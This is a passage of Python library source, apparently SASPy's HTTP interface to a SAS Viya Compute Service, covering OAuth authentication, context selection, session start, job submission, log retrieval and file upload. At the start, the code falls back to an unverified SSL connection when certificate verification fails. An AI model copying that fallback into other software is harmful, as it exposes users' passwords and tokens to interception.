certificate verification failed, creating an unverified SSL connection. Error was:\"+str(e))\n self.HTTPConn = hc.HTTPSConnection(self.ip, self.port, timeout=self.timeout, context=ssl._create_unverified_context())\n logger.warning(\"You can set 'verify=False' to get rid of this message \")\n if not self._token:\n self._token = self._authenticate(user, pw, authcode, client_id, client_secret, jwt)\n else:\n self.HTTPConn = hc.HTTPSConnection(self.ip, self.port, timeout=self.timeout, context=ssl._create_unverified_context())\n if not self._token:\n self._token = self._authenticate(user, pw, authcode, client_id, client_secret, jwt)\n else:\n self.HTTPConn = hc.HTTPConnection(self.ip, self.port, timeout=self.timeout)\n if not self._token:\n self._token = self._authenticate(user, pw, authcode, client_id, client_secret, jwt)\n\n if not self._token:\n logger.error(\"Could not acquire an Authentication Token\")\n return\n\n # GET Contexts\n contexts = self._get_contexts()\n if contexts == None:\n self._token = None\n raise SASHTTPconnectionError(msg=\"No Contexts found on Compute Service at ip=\"+self.ip)\n\n ctxnames = []\n for i in range(len(contexts)):\n ctxnames.append(contexts[i].get('name'))\n\n if len(ctxnames) == 0:\n self._token = None\n raise SASHTTPconnectionError(msg=\"No Contexts found on Compute Service at ip=\"+self.ip)\n\n if len(self.ctxname) == 0:\n if len(ctxnames) == 1:\n self.ctxname = ctxnames[0]\n logger.info(\"Using SAS Context: \" + self.ctxname)\n else:\n try:\n ctxname = self._prompt(\"Please enter the SAS Context you wish to run. Available contexts are: \" +\n str(ctxnames)+\" \")\n if ctxname is None:\n self._token = None\n raise RuntimeError(\"No SAS Context provided.\")\n else:\n self.ctxname = ctxname\n except:\n raise SASHTTPconnectionError(msg=\n \"SAS Context specified '\"+self.ctxname+\"' was not found. Prompting failed. Available contexts were: \" +\n str(ctxnames)+\" \")\n\n while self.ctxname not in ctxnames:\n if not lock:\n ''' this was original code before compute was production. users can't create these on the fly.\n createctx = self._prompt(\n \"SAS Context specified was not found. Do you want to create a new context named \"+self.ctxname+\" [Yes|No]?\")\n if createctx.upper() in ('YES', 'Y'):\n contexts = self._create_context(user)\n else:\n '''\n try:\n ctxname = self._prompt(\n \"SAS Context specified was not found. Please enter the SAS Context you wish to run. Available contexts are: \" +\n str(ctxnames)+\" \")\n if ctxname is None:\n self._token = None\n raise SASHTTPconnectionError(msg=\n \"SAS Context specified '\"+self.ctxname+\"' was not found. Prompting failed. Available contexts were: \" +\n str(ctxnames)+\" \")\n else:\n self.ctxname = ctxname\n except:\n raise SASHTTPconnectionError(msg=\n \"SAS Context specified '\"+self.ctxname+\"' was not found. Prompting failed. Available contexts were: \" +\n str(ctxnames)+\" \")\n else:\n msg = \"SAS Context specified in the SASconfig (\"+self.ctxname+\") was not found on this server, and because \"\n msg += \"the SASconfig is in lockdown mode, there is no prompting for other contexts. No connection established.\"\n logger.error(msg)\n self._token = None\n raise RuntimeError(\"No SAS Context provided.\")\n\n for i in range(len(contexts)):\n if contexts[i].get('name') == self.ctxname:\n self.ctx = contexts[i]\n break\n\n if self.ctx == {}:\n raise SASHTTPconnectionError(msg=\"No context information returned for context {}\\n{}\".format(self.ctxname, contexts))\n\n return\n\n def _authenticate(self, user, pw, authcode, client_id, client_secret, jwt):\n #import pdb; pdb.set_trace()\n if authcode:\n uauthcode = urllib.parse.quote(authcode)\n uclient_id = urllib.parse.quote(client_id)\n uclient_secret = urllib.parse.quote(client_secret)\n d1 = (\"grant_type=authorization_code&code=\"+uauthcode+\n \"&client_id=\"+uclient_id+\"&client_secret=\"+uclient_secret).encode(self.encoding)\n headers = {\"Accept\":\"application/vnd.sas.compute.session+json\",\"Content-Type\":\"application/x-www-form-urlencoded\"}\n elif jwt:\n ujwt = urllib.parse.quote(jwt)\n d1 = \"grant_type=urn:ietf:params:oauth:grant-type:jwt-bearer&assertion=\"+ujwt\n client = \"Basic \"+base64.encodebytes((client_id+\":\").encode(self.encoding)).splitlines()[0].decode(self.encoding)\n headers = {\"Accept\":\"application/vnd.sas.compute.session+json\",\n \"Content-Type\":\"application/x-www-form-urlencoded\",\n \"Authorization\":client}\n else:\n uuser = urllib.parse.quote(user)\n upw = urllib.parse.quote(pw)\n d1 = (\"grant_type=password&username=\"+uuser+\"&password=\"+upw).encode(self.encoding)\n client = \"Basic \"+base64.encodebytes(\"sas.tkmtrb:\".encode(self.encoding)).splitlines()[0].decode(self.encoding)\n #client = \"Basic \"+base64.encodebytes((client_id+\":\").encode(self.encoding)).splitlines()[0].decode(self.encoding)\n headers = {\"Accept\":\"application/vnd.sas.compute.session+json\",\"Content-Type\":\"application/x-www-form-urlencoded\",\n \"Authorization\":client}\n\n # POST AuthToken\n conn = self.HTTPConn; conn.connect()\n try:\n conn.request('POST', \"/SASLogon/oauth/token\", body=d1, headers=headers)\n req = conn.getresponse()\n except:\n #print(\"Failure in GET AuthToken. Could not connect to the logon service. Exception info:\\n\"+str(sys.exc_info()))\n msg=\"Failure in GET AuthToken. Could not connect to the logon service. Exception info:\\n\"+str(sys.exc_info())\n raise SASHTTPauthenticateError(msg)\n #return None\n\n status = req.status\n resp = req.read()\n conn.close()\n\n if status > 299:\n #print(\"Failure in GET AuthToken. Status=\"+str(status)+\"\\nResponse=\"+resp.decode(self.encoding))\n msg=\"Failure in GET AuthToken. Status=\"+str(status)+\"\\nResponse=\"+str(resp)\n raise SASHTTPauthenticateError(msg)\n #return None\n\n js = json.loads(resp.decode(self.encoding))\n token = js.get('access_token')\n return token\n\n def _get_contexts(self):\n #import pdb; pdb.set_trace()\n\n # GET Contexts\n conn = self.HTTPConn; conn.connect()\n headers={\"Accept\":\"application/vnd.sas.collection+json\",\n \"Accept-Item\":\"application/vnd.sas.compute.context.summary+json\",\n \"Authorization\":\"Bearer \"+self._token}\n conn.request('GET', \"/compute/contexts?limit=999999\", headers=headers)\n req = conn.getresponse()\n status = req.status\n resp = req.read()\n conn.close()\n\n if status > 299:\n fmsg = \"Failure in GET Contexts. Status=\"+str(status)+\"\\nResponse=\"+resp.decode(self.encoding)\n raise SASHTTPconnectionError(msg=fmsg)\n\n js = json.loads(resp.decode(self.encoding))\n contexts = js.get('items')\n\n return contexts\n\n def _create_context(self, user):\n # GET Contexts\n conn = self.HTTPConn; conn.connect()\n d1 = '{\"name\": \"SASPy\",\"version\": 1,\"description\": \"SASPy Context\",\"attributes\": {\"sessionInactiveTimeout\": 60 },'\n d1 += '\"launchContext\": {\"contextName\": \"'+self.ctxname+'\"},\"launchType\": \"service\",\"authorizedUsers\": [\"'+user+'\"]}'\n\n headers={\"Accept\":\"application/vnd.sas.compute.context+json\",\n \"Content-Type\":\"application/vnd.sas.compute.context.request+json\",\n \"Authorization\":\"Bearer \"+self._token}\n conn.request('POST', \"/compute/contexts\", body=d1, headers=headers)\n req = conn.getresponse()\n status = req.status\n resp = req.read()\n conn.close()\n\n if status > 299:\n logger.error(\"Failure in POST Context. Status=\"+str(status)+\"\\nResponse=\"+resp.decode(self.encoding))\n return None\n\n contexts = self._get_contexts()\n return contexts\n\n\nclass SASsessionHTTP():\n '''\n The SASsession object is the main object to instantiate and provides access to the rest of the functionality.\n cfgname - value in SAS_config_names List of the sascfg.py file\n kernel - None - internal use when running the SAS_kernel notebook\n user - userid to use to connect to Compute Service\n pw - pw for the userid being used to connect to Compute Service\n ip - overrides IP Dict entry of cfgname in sascfg.py file\n port - overrides Port Dict entry of cfgname in sascfg.py file\n context - overrides Context Dict entry of cfgname in sascfg.py file\n options - overrides Options Dict entry of cfgname in sascfg.py file\n encoding - This is the python encoding value that matches the SAS session encoding of the Compute Server you are connecting to\n '''\n #def __init__(self, cfgname: str ='', kernel: '<SAS_kernel object>' =None, user: str ='', pw: str ='',\n # ip: str ='', port: int ='', context: str ='', options: list =[]) -> '<SASsession object>':\n def __init__(self, **kwargs):\n self.pid = None\n self._session = None\n self._sb = kwargs.get('sb', None)\n self._log = \"\\nNo SAS session established, something must have failed trying to connect\\n\"\n self.sascfg = SASconfigHTTP(self, **kwargs)\n\n if self.sascfg._token:\n self._startsas()\n else:\n None\n\n def __del__(self):\n if self._session:\n self._endsas()\n self._sb.SASpid = None\n return\n\n def _startsas(self):\n if self.pid:\n return self.pid\n\n if len(self.sascfg.options):\n options = '[';\n for opt in self.sascfg.options:\n options += '\"'+opt+'\", '\n options = (options.rpartition(','))[0]+']'\n else:\n options = '[]'\n\n # POST Session\n uri = None\n for ld in self.sascfg.ctx.get('links'):\n if ld.get('method') == 'POST':\n uri = ld.get('uri')\n break\n\n if not uri:\n raise SASHTTPconnectionError(msg=\n \"POST uri not found in context info. You may not have permission to use this context.\\n{}\".format(self.sascfg.ctx))\n\n conn = self.sascfg.HTTPConn; conn.connect()\n d1 = '{\"name\":\"'+self.sascfg.ctxname+'\", \"description\":\"saspy session\", \"version\":1, \"environment\":{\"options\":'+options+'}'\n d1 += ',\"attributes\": {\"sessionInactiveTimeout\": '+str(int(float(self.sascfg.inactive)*60))+'}}'\n headers={\"Accept\":\"application/vnd.sas.compute.session+json\",\"Content-Type\":\"application/vnd.sas.compute.session.request+json\",\n \"Authorization\":\"Bearer \"+self.sascfg._token}\n\n try:\n conn.request('POST', uri, body=d1, headers=headers)\n req = conn.getresponse()\n except:\n #print(\"Could not acquire a SAS Session for context: \"+self.sascfg.ctxname)\n raise SASHTTPconnectionError(msg=\"Could not acquire a SAS Session for context: \"+self.sascfg.ctxname+\". Exception info:\\n\"+str(sys.exc_info()))\n #return None\n\n status = req.status\n resp = req.read()\n conn.close()\n\n if status > 299:\n #print(\"Failure in POST Session \\n\"+resp.decode(self.sascfg.encoding))\n #print(\"Could not acquire a SAS Session for context: \"+self.sascfg.ctxname)\n msg=\"Could not acquire a SAS Session for context: \"+self.sascfg.ctxname+\". Exception info:\\nStatus=\"+str(status)+\"\\nResponse=\"+str(resp)\n raise SASHTTPconnectionError(msg)\n #return None\n\n self._session = json.loads(resp.decode(self.sascfg.encoding))\n\n if self._session == None:\n logger.error(\"Could not acquire a SAS Session for context: \"+self.sascfg.ctxname)\n return None\n\n #GET Session uri's once\n for ld in self._session.get('links'):\n if ld.get('method') == 'GET' and ld.get('rel') == 'log':\n self._uri_log = ld.get('uri')\n elif ld.get('method') == 'GET' and ld.get('rel') == 'listing':\n self._uri_lst = ld.get('uri')\n elif ld.get('method') == 'GET' and ld.get('rel') == 'results':\n self._uri_ods = ld.get('uri')\n elif ld.get('method') == 'GET' and ld.get('rel') == 'state':\n self._uri_state = ld.get('uri')\n elif ld.get('method') == 'POST' and ld.get('rel') == 'execute':\n self._uri_exe = ld.get('uri')\n elif ld.get('method') == 'PUT' and ld.get('rel') == 'cancel':\n self._uri_can = ld.get('uri')\n elif ld.get('method') == 'DELETE' and ld.get('rel') == 'delete':\n self._uri_del = ld.get('uri')\n elif ld.get('method') == 'GET' and ld.get('rel') == 'files':\n self._uri_files = ld.get('uri')\n\n self.pid = self._session.get('id')\n\n self._log = self._getlog()\n\n # POST Job - Lets see if the server really came up, cuz you can't tell from what happend so far\n conn = self.sascfg.HTTPConn; conn.connect()\n jcode = json.dumps('\\n')\n d1 = '{\"code\":['+jcode+']}'\n headers={\"Accept\":\"application/json\",\"Content-Type\":\"application/vnd.sas.compute.job.request+json\",\n \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('POST', self._uri_exe, body=d1, headers=headers)\n req = conn.getresponse()\n status = req.status\n resp = req.read()\n conn.close()\n\n try:\n jobid = json.loads(resp.decode(self.sascfg.encoding))\n except:\n jobid = None\n\n if not jobid or status > 299:\n logger.error(\"Compute server had issues starting:\\n\")\n for key in jobid:\n logger.error(key+\"=\"+str(jobid.get(key)))\n return None\n\n self._sb.SESSION_ID = self.pid\n ll = self.submit(\"options svgtitle='svgtitle'; options validvarname=any validmemname=extend pagesize=max nosyntaxcheck; ods graphics on;\", \"text\")\n if self.sascfg.verbose:\n logger.info(\"SAS server started using Context \"+self.sascfg.ctxname+\" with SESSION_ID=\"+self.pid)\n\n return self.pid\n\n def _endsas(self):\n rc = 0\n if self._session:\n # DELETE Session\n conn = self.sascfg.HTTPConn; conn.connect()\n headers={\"Accept\":\"application/json\",\"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('DELETE', self._uri_del, headers=headers)\n req = conn.getresponse()\n resp = req.read()\n conn.close()\n\n if self.sascfg.verbose:\n logger.info(\"SAS server terminated for SESSION_ID=\"+self._session.get('id'))\n self._session = None\n self.pid = None\n self._sb.SASpid = None\n return rc\n\n\n def _getlog(self, jobid=None):\n start = 0\n logr = ''\n\n # GET Log\n if jobid:\n for ld in jobid.get('links'):\n if ld.get('method') == 'GET' and ld.get('rel') == 'log':\n uri = ld.get('uri')\n break\n else:\n uri = self._uri_log\n\n while True:\n # GET Log\n conn = self.sascfg.HTTPConn; conn.connect()\n headers={\"Accept\":\"application/vnd.sas.collection+json\", \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('GET', uri+\"?start=\"+str(start)+\"&limit=\"+str(start+1000), headers=headers)\n req = conn.getresponse()\n status = req.status\n resp = req.read()\n conn.close()\n\n try:\n js = json.loads(resp.decode(self.sascfg.encoding))\n log = js.get('items')\n lines = len(log)\n except:\n lines = None\n\n if not lines:\n break\n start += lines\n\n for line in log:\n logr += line.get('line')+'\\n'\n\n if jobid != None:\n self._log += logr.replace(chr(12), chr(10))\n\n if logr.count('ERROR:') > 0:\n warnings.warn(\"Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem\")\n self._sb.check_error_log = True\n\n return logr\n\n def _getlst(self, jobid=None):\n htm = ''\n i = 0\n\n # GET the list of results\n if jobid:\n for ld in jobid.get('links'):\n if ld.get('method') == 'GET' and ld.get('rel') == 'results':\n uri = ld.get('uri')+\"?includeTypes=ODS\"\n break\n else:\n uri = self._uri_lst\n\n conn = self.sascfg.HTTPConn; conn.connect()\n headers={\"Accept\":\"application/vnd.sas.collection+json\", \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('GET', uri, headers=headers)\n req = conn.getresponse()\n status = req.status\n resp = req.read()\n conn.close()\n\n try:\n js = json.loads(resp.decode(self.sascfg.encoding))\n results = js.get('items')\n if not results:\n results = []\n except:\n results = []\n\n conn = self.sascfg.HTTPConn; conn.connect()\n headers={\"Accept\":\"application/vnd.sas.collection+json\", \"Authorization\":\"Bearer \"+self.sascfg._token}\n while i < len(results):\n # GET an ODS Result\n if results[i].get('type') == 'ODS' and len(results[i].get('links')) > 0:\n conn.request('GET', results[i].get('links')[0].get('href'), headers=headers)\n req = conn.getresponse()\n status = req.status\n resp = req.read()\n htm += resp.decode(self.sascfg.encoding)\n i += 1\n conn.close()\n\n lstd = htm.replace(chr(12), chr(10)).replace('<body class=\"c body\">',\n '<body class=\"l body\">').replace(\"font-size: x-small;\",\n \"font-size: normal;\")\n return lstd\n\n def _getlsttxt(self, jobid=None):\n start = 0\n lstr = ''\n\n # GET Log\n if jobid:\n for ld in jobid.get('links'):\n if ld.get('method') == 'GET' and ld.get('rel') == 'listing':\n uri = ld.get('uri')\n break\n else:\n uri = self._uri_lst\n\n while True:\n conn = self.sascfg.HTTPConn; conn.connect()\n headers={\"Accept\":\"application/vnd.sas.collection+json\", \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('GET', uri+\"?start=\"+str(start)+\"&limit=\"+str(start+1000), headers=headers)\n req = conn.getresponse()\n status = req.status\n resp = req.read()\n conn.close()\n\n try:\n js = json.loads(resp.decode(self.sascfg.encoding))\n lst = js.get('items')\n lines = len(lst)\n except:\n lines = None\n\n if not lines:\n break\n start += lines\n\n for line in lst:\n lstr += line.get('line')+'\\n'\n\n return lstr\n\n def _asubmit(self, code, results=\"html\"):\n #odsopen = json.dumps(\"ods listing close;ods html5 (id=saspy_internal) options(bitmap_mode='inline') device=png; ods graphics on / outputfmt=png;\\n\")\n #odsopen = json.dumps(\"ods listing close;ods html5 (id=saspy_internal) options(bitmap_mode='inline') device=svg; ods graphics on / outputfmt=png;\\n\")\n #odsclose = json.dumps(\"ods html5 (id=saspy_internal) close;ods listing;\\n\")\n odsopen = json.dumps(\"ods listing close;ods \"+self.sascfg.output+\" (id=saspy_internal) options(bitmap_mode='inline') device=svg style=\"+self._sb.HTML_Style+\"; ods graphics on / outputfmt=png;\\n\")\n odsclose = json.dumps(\"ods \"+self.sascfg.output+\" (id=saspy_internal) close;ods listing;\\n\")\n ods = True;\n\n if results.upper() != \"HTML\":\n ods = False\n odsopen = '\"\"'\n odsclose = '\"\"'\n\n # POST Job\n conn = self.sascfg.HTTPConn; conn.connect()\n jcode = json.dumps(code)\n d1 = '{\"code\":['+odsopen+','+jcode+','+odsclose+']}'\n headers={\"Accept\":\"application/json\",\"Content-Type\":\"application/vnd.sas.compute.job.request+json\",\n \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('POST', self._uri_exe, body=d1, headers=headers)\n req = conn.getresponse()\n resp = req.read()\n conn.close()\n\n jobid = json.loads(resp.decode(self.sascfg.encoding))\n\n return jobid\n\n def _jobstate(self, jobid):\n\n uri = None\n for ld in jobid.get('links'):\n if ld.get('method') == 'GET' and ld.get('rel') == 'state':\n uri = ld.get('uri')\n break\n\n if not uri:\n print(\"No job found\")\n return None\n\n conn = self.sascfg.HTTPConn;\n headers = {\"Accept\":\"text/plain\", \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.connect()\n conn.request('GET', uri, headers=headers)\n req = conn.getresponse()\n resp = req.read()\n conn.close()\n\n return resp\n\n\n def submit(self, code: str, results: str =\"html\", prompt: dict = None, **kwargs) -> dict:\n '''\n code - the SAS statements you want to execute\n results - format of results, HTML is default, TEXT is the alternative\n prompt - dict of names:flags to prompt for; create marco variables (used in submitted code), then keep or delete\n The keys are the names of the macro variables and the boolean flag is to either hide what you type and delete\n the macros, or show what you type and keep the macros (they will still be available later)\n for example (what you type for pw will not be displayed, user and dsname will):\n\n results = sas.submit(\n \"\"\"\n libname tera teradata server=teracop1 user=&user pw=&pw;\n proc print data=tera.&dsname (obs=10); run;\n \"\"\" ,\n prompt = {'user': False, 'pw': True, 'dsname': False}\n )\n\n Returns - a Dict containing two keys:values, [LOG, LST]. LOG is text and LST is 'results' (HTML or TEXT)\n\n NOTE: to view HTML results in the ipykernel, issue: from IPython.display import HTML and use HTML() instead of print()\n i.e,: results = sas.submit(\"data a; x=1; run; proc print;run')\n print(results['LOG'])\n HTML(results['LST'])\n '''\n prompt = prompt if prompt is not None else {}\n printto = kwargs.pop('undo', False)\n\n #odsopen = json.dumps(\"ods listing close;ods html5 (id=saspy_internal) options(bitmap_mode='inline') device=png; ods graphics on / outputfmt=png;\\n\")\n #odsopen = json.dumps(\"ods listing close;ods html5 (id=saspy_internal) options(bitmap_mode='inline') device=svg; ods graphics on / outputfmt=png;\\n\")\n #odsclose = json.dumps(\"ods html5 (id=saspy_internal) close;ods listing;\\n\")\n odsopen = json.dumps(\"ods listing close;ods \"+self.sascfg.output+\" (id=saspy_internal) options(bitmap_mode='inline') device=svg style=\"+self._sb.HTML_Style+\"; ods graphics on / outputfmt=png;\\n\")\n odsclose = json.dumps(\"ods \"+self.sascfg.output+\" (id=saspy_internal) close;ods listing;\\n\")\n ods = True;\n pcodei = ''\n pcodeiv = ''\n pcodeo = ''\n\n if self._session == None:\n logger.error(\"No SAS process attached. SAS process has terminated unexpectedly.\")\n return dict(LOG=\"No SAS process attached. SAS process has terminated unexpectedly.\", LST='')\n\n if results.upper() != \"HTML\":\n ods = False\n odsopen = '\"\"'\n odsclose = '\"\"'\n\n if len(prompt):\n pcodei += 'options nosource nonotes;\\n'\n pcodeo += 'options nosource nonotes;\\n'\n for key in prompt:\n gotit = False\n while not gotit:\n var = self.sascfg._prompt('Please enter value for macro variable '+key+' ', pw=prompt[key])\n if var is None:\n raise RuntimeError(\"No value for prompted macro variable provided.\")\n if len(var) > 0:\n gotit = True\n else:\n print(\"Sorry, didn't get a value for that variable.\")\n if prompt[key]:\n pcodei += '%let '+key+'='+var+';\\n'\n else:\n pcodeiv += '%let '+key+'='+var+';\\n'\n if prompt[key]:\n pcodeo += '%symdel '+key+';\\n'\n pcodei += 'options source notes;\\n'\n pcodeo += 'options source notes;\\n'\n\n # POST Job\n conn = self.sascfg.HTTPConn; conn.connect()\n jcode = json.dumps(pcodei+pcodeiv+code+'\\n'+pcodeo)\n d1 = '{\"code\":['+odsopen+','+jcode+','+odsclose+']}'\n headers={\"Accept\":\"application/json\",\"Content-Type\":\"application/vnd.sas.compute.job.request+json\",\n \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('POST', self._uri_exe, body=d1, headers=headers)\n req = conn.getresponse()\n status = req.status\n resp = req.read()\n conn.close()\n\n try:\n jobid = json.loads(resp.decode(self.sascfg.encoding))\n except:\n raise SASHTTPsubmissionError(msg=\"Problem parsing response from Compute Service.\\n Status=\"+str(status)+\"\\n Response=\"+str(resp))\n\n if not jobid or status > 299:\n raise SASHTTPsubmissionError(msg=\"Problem submitting job to Compute Service.\\n Status code=\"+str(jobid.get('httpStatusCode'))+\"\\n Message=\"+jobid.get('message'))\n\n for ld in jobid.get('links'):\n if ld.get('method') == 'GET' and ld.get('rel') == 'state':\n uri = ld.get('uri')\n break\n\n conn = self.sascfg.HTTPConn;\n headers = {\"Accept\":\"text/plain\", \"Authorization\":\"Bearer \"+self.sascfg._token}\n done = False\n\n delay = kwargs.get('GETstatusDelay' , 0)\n excpcnt = kwargs.get('GETstatusFailcnt', 5)\n\n while not done:\n try:\n while True:\n # GET Status for JOB\n conn.connect()\n conn.request('GET', uri, headers=headers)\n req = conn.getresponse()\n resp = req.read()\n conn.close()\n if resp not in [b'running', b'pending']:\n done = True\n break\n sleep(delay)\n\n except (KeyboardInterrupt, SystemExit):\n conn.close()\n print('Exception caught!')\n response = self.sascfg._prompt(\n \"SAS attention handling not yet supported over HTTP. Please enter (Q) to Quit waiting for results or (C) to continue waiting.\")\n while True:\n if response is None or response.upper() == 'Q':\n return dict(LOG='', LST='', BC=True)\n if response.upper() == 'C':\n break\n response = self.sascfg._prompt(\"Please enter (Q) to Quit waiting for results or (C) to continue waiting.\")\n\n except hc.RemoteDisconnected as Dis:\n conn.close()\n print('RemoteDisconnected Exception caught!\\n'+str(Dis))\n excpcnt -= 1\n if excpcnt < 0:\n raise\n\n logd = self._getlog(jobid).replace(chr(12), chr(10))\n\n if ods:\n lstd = self._getlst(jobid).replace(chr(12), chr(10))\n else:\n lstd = self._getlsttxt(jobid).replace(chr(12), chr(10))\n\n trip = lstd.rpartition(\"/*]]>*/\")\n if len(trip[1]) > 0 and len(trip[2]) < 200:\n lstd = ''\n\n self._sb._lastlog = logd\n\n # issue 294\n if printto:\n conn = self.sascfg.HTTPConn; conn.connect()\n jcode = json.dumps('proc printto;run;\\n')\n d1 = '{\"code\":['+jcode+']}'\n headers={\"Accept\":\"application/json\",\"Content-Type\":\"application/vnd.sas.compute.job.request+json\",\n \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('POST', self._uri_exe, body=d1, headers=headers)\n req = conn.getresponse()\n status = req.status\n resp = req.read()\n conn.close()\n\n if logd.count('ERROR:') > 0:\n warnings.warn(\"Noticed 'ERROR:' in LOG, you ought to take a look and see if there was a problem\")\n self._sb.check_error_log = True\n\n return dict(LOG=logd, LST=lstd)\n\n def saslog(self):\n '''\n this method is used to get the current, full contents of the SASLOG\n '''\n return self._log\n\n def exist(self, table: str, libref: str =\"\") -> bool:\n '''\n table - the name of the SAS Data Set\n libref - the libref for the Data Set, defaults to WORK, or USER if assigned\n\n Returns True it the Data Set exists and False if it does not\n '''\n #can't have an empty libref, so check for user or work\n sd = table.strip().replace(\"'\", \"''\")\n if not libref:\n # HEAD Libref USER\n conn = self.sascfg.HTTPConn; conn.connect()\n headers={\"Accept\":\"*/*\", \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('HEAD', \"/compute/sessions/\"+self.pid+\"/data/USER\", headers=headers)\n req = conn.getresponse()\n status = req.status\n conn.close()\n\n if status == 200:\n libref = 'USER'\n else:\n libref = 'WORK'\n\n code = 'data _null_; e = exist(\"'\n code += libref+\".\"\n code += \"'\"+sd+\"'n\"+'\"'+\");\\n\"\n code += 'v = exist(\"'\n code += libref+\".\"\n code += \"'\"+sd+\"'n\"+'\"'+\", 'VIEW');\\n if e or v then e = 1;\\n\"\n code += \"te='TABLE_EXISTS='; put te e;run;\\n\"\n\n ll = self.submit(code, \"text\")\n\n l2 = ll['LOG'].rpartition(\"TABLE_EXISTS= \")\n l2 = l2[2].partition(\"\\n\")\n exists = int(l2[0])\n\n return bool(exists)\n\n \"\"\"\n # HEAD Data Table\n conn = self.sascfg.HTTPConn; conn.connect()\n headers={\"Accept\":\"*/*\", \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('HEAD', \"/compute/sessions/\"+self.pid+\"/data/\"+libref+\"/\"+table, headers=headers)\n req = conn.getresponse()\n status = req.status\n conn.close()\n\n if status == 200:\n exists = True\n else:\n exists = False\n\n return exists\n \"\"\"\n\n def read_csv(self, file: str, table: str, libref: str =\"\", nosub: bool=False, opts: dict ={}) -> '<SASdata object>':\n '''\n This method will import a csv file into a SAS Data Set and return the SASdata object referring to it.\n file - eithe the OS filesystem path of the file, or HTTP://... for a url accessible file\n table - the name of the SAS Data Set to create\n libref - the libref for the SAS Data Set being created. Defaults to WORK, or USER if assigned\n opts - a dictionary containing any of the following Proc Import options(datarow, delimiter, getnames, guessingrows)\n '''\n code = \"filename x \"\n\n if file.lower().startswith(\"http\"):\n code += \"url \"\n\n code += \"\\\"\"+file+\"\\\";\\n\"\n code += \"proc import datafile=x out=\"\n if len(libref):\n code += libref+\".\"\n code += \"'\"+table.strip().replace(\"'\", \"''\")+\"'n dbms=csv replace; \"+self._sb._impopts(opts)+\" run;\"\n\n if nosub:\n print(code)\n else:\n ll = self.submit(code, \"text\")\n\n def write_csv(self, file: str, table: str, libref: str =\"\", nosub: bool =False, dsopts: dict ={}, opts: dict ={}) -> 'The LOG showing the results of the step':\n '''\n This method will export a SAS Data Set to a file in CCSV format.\n file - the OS filesystem path of the file to be created (exported from the SAS Data Set)\n table - the name of the SAS Data Set you want to export to a CSV file\n libref - the libref for the SAS Data Set.\n opts - a dictionary containing any of the following Proc Export options(delimiter, putnames)\n '''\n code = \"filename x \\\"\"+file+\"\\\";\\n\"\n code += \"options nosource;\\n\"\n code += \"proc export data=\"\n\n if len(libref):\n code += libref+\".\"\n\n code += \"'\"+table.strip().replace(\"'\", \"''\")+\"'n \"+self._sb._dsopts(dsopts)+\" outfile=x dbms=csv replace; \"\n code += self._sb._expopts(opts)+\" run\\n;\"\n code += \"options source;\\n\"\n\n if nosub:\n print(code)\n else:\n ll = self.submit(code, \"text\")\n return ll['LOG']\n\n def upload(self, localfile: str, remotefile: str, overwrite: bool = True, permission: str = '', **kwargs):\n \"\"\"\n This method uploads a local file to the SAS servers file system.\n localfile - path to the local file to upload\n remotefile - path to remote file to create or overwrite\n overwrite - overwrite the output file if it exists?\n permission - permissions to set on the new file. See SAS Filename Statement Doc for syntax\n \"\"\"\n valid = self._sb.file_info(remotefile, quiet = True)\n\n if valid is None:\n remf = remotefile\n else:\n if valid == {}:\n remf = remotefile + self._sb.hostsep + localfile.rpartition(os.sep)[2]\n else:\n remf = remotefile\n if overwrite == False:\n return {'Success' : False,\n 'LOG' : \"File \"+str(remotefile)+\" exists and overwrite was set to False. Upload was stopped.\"}\n\n try:\n fd = open(localfile, 'rb')\n except OSError as e:\n return {'Success' : False,\n 'LOG' : \"File \"+str(localfile)+\" could not be opened. Error was: \"+str(e)}\n\n fsize = os.path.getsize(localfile)\n\n if fsize > 0:\n code = \"filename _sp_updn '\"+remf+\"' recfm=N permission='\"+permission+\"';\"\n ll = self.submit(code, 'text')\n logf = ll['LOG']\n\n # GET Etag\n conn = self.sascfg.HTTPConn; conn.connect()\n headers={\"Accept\":\"application/vnd.sas.compute.fileref+json;application/json\",\n \"Authorization\":\"Bearer \"+self.sascfg._token}\n conn.request('GET', self._uri_files+\"/_sp_updn\", headers=headers)\n req = conn.getresponse()\n status = req.status\n resp = req.read()\n conn.close()\n\n Etag = req.getheader(\"Etag\")\n\n # PUT data\n conn = self.sascfg.HTTPConn; conn.connect()\n headers={\"Accept\":\"*/*\",\"Content-Type\":\"application/octet-stream\",\n \"Transfer-Encoding\" : \"chunked\",\n \"Authorization\":\"Bearer \"+self.sascfg._token}\n\n conn.connect()\n conn.putrequest('PUT', self._uri_files+\"/_sp_updn/content\")\n conn.putheader(\"Accept\",\"*/*\")\n conn.putheader(\"Content-Type\",\"application/octet-stream\")\n conn.putheader(\"If-Match\",Etag)\n conn.putheader(\"Transfer-Encoding\",\"chunked\")\n conn.putheader(\"Authorization\",\"Bearer \"+self.sascfg._token)\n conn.endheaders()\n\n blksz = int(kwargs.get('blocksize', 50000))\n while True:\n buf = fd.read1(blksz)\n if len(buf) == 0:\n conn.send(b\"0\\r\\n\\r\\n\")\n break\n\n lenstr = \"%s\\r\\n\" % hex(len(buf))[2:]\n conn.send(lenstr.encode())\n conn.send(buf)\n conn.send(b\"\\r\\n\")\n\n req = conn.getresponse()\n status = req.status\n resp = req.read()\n conn.close()\n\n code = \"filename _sp_updn;\"\n else:\n logf = ''\n code = \"\"\"\n filename _sp_updn '\"\"\"+remf+\"\"\"' recfm=F encoding=binary lrecl=1 permission='\"\"\"+permission+\"\"\"';\n data _null_;\n fid = fopen('_sp_updn', 'O');\n if fid then\n rc = fclose(fid);\n run;\n filename _sp_updn;\n \"\"\"\n\n ll = self.submit(code, 'text')\n logf += ll['LOG']\n fd.close()\n\n return {'Success' : True,\n 'LOG' : logf}\n\n def download(self, localfile: str, remotefile: str, overwrite: bool = True, **kwargs):\n \"\"\"\n This method downloads a remote file from the SAS servers file system.\n localfile - path to the local file 